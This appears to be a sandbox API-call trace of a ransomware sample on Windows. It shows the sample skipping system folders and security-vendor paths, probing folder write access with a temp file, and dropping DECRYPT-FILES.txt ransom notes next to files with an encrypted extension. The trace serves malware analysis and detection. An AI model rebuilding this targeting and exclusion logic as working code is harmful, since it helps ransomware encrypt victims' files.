FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xeee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms.ISH3V", cAlternateFileName="VIDEOS~1.ISH")) returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="DECRYPT-FILES.txt") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="autorun.inf") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="boot.ini") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="desktop.ini") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="ntuser.dat") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="iconcache.db") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="bootsect.bak") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="ntuser.dat.log") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="thumbs.db") returned 1 [0186.430] lstrcmpiW (lpString1="Videos.library-ms.ISH3V", lpString2="Bootfont.bin") returned 1 [0186.431] lstrlenW (lpString="Videos.library-ms.ISH3V") returned 23 [0186.431] lstrcmpiW (lpString1="ISH3V", lpString2="lnk") returned -1 [0186.431] lstrcmpiW (lpString1="ISH3V", lpString2="exe") returned 1 [0186.431] lstrcmpiW (lpString1="ISH3V", lpString2="sys") returned -1 [0186.431] lstrcmpiW (lpString1="ISH3V", lpString2="dll") returned 1 [0186.431] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.431] lstrlenW (lpString="Videos.library-ms.ISH3V") returned 23 [0186.431] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0186.431] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Videos.library-ms.ISH3V" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.ISH3V") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.ISH3V" [0186.431] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.431] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.ISH3V" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.ish3v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.431] CloseHandle (hObject=0x0) returned 0 [0186.431] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.431] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xeee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms.ISH3V", cAlternateFileName="VIDEOS~1.ISH")) returned 0 [0186.431] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.432] CloseHandle (hObject=0xffffffff) returned 0 [0186.432] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0186.432] lstrcmpW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0186.432] lstrcmpW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0186.432] lstrcatW (in: lpString1="Network Shortcuts", lpString2="\\" | out: lpString1="Network Shortcuts\\") returned="Network Shortcuts\\" [0186.432] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Network Shortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Program Files") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch=":\\Windows") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Games\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\All Users") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.432] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.433] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="AhnLab") returned 0x0 [0186.433] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.433] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 69 [0186.433] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.433] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\0a16c9.tmp") returned 80 [0186.433] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.433] GetLastError () returned 0x5 [0186.433] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 69 [0186.433] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.433] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt") returned 87 [0186.433] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.433] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned 69 [0186.433] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0186.433] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.433] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.433] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.433] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.433] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.433] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.433] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.433] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.434] CloseHandle (hObject=0xffffffff) returned 0 [0186.434] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0186.434] lstrcmpW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0186.434] lstrcmpW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0186.434] lstrcatW (in: lpString1="Printer Shortcuts", lpString2="\\" | out: lpString1="Printer Shortcuts\\") returned="Printer Shortcuts\\" [0186.434] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Printer Shortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Program Files") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch=":\\Windows") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Games\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\All Users") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="AhnLab") returned 0x0 [0186.434] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.434] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 69 [0186.434] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.434] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\0a16c9.tmp") returned 80 [0186.434] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.434] GetLastError () returned 0x5 [0186.434] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 69 [0186.434] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.435] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt") returned 87 [0186.435] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.435] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 69 [0186.435] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0186.435] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.435] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.435] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.436] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.436] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.436] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.436] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.436] CloseHandle (hObject=0xffffffff) returned 0 [0186.436] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0186.436] lstrcmpW (lpString1="PrivacIE", lpString2=".") returned 1 [0186.436] lstrcmpW (lpString1="PrivacIE", lpString2="..") returned 1 [0186.436] lstrcatW (in: lpString1="PrivacIE", lpString2="\\" | out: lpString1="PrivacIE\\") returned="PrivacIE\\" [0186.436] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="PrivacIE\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Program Files") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch=":\\Windows") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Games\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\All Users") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="AhnLab") returned 0x0 [0186.436] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.436] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 60 [0186.436] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.436] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\0a16c9.tmp") returned 71 [0186.436] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.437] GetLastError () returned 0x5 [0186.437] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 60 [0186.437] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.437] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt") returned 78 [0186.437] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.437] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 60 [0186.437] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0186.437] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.437] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.437] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, 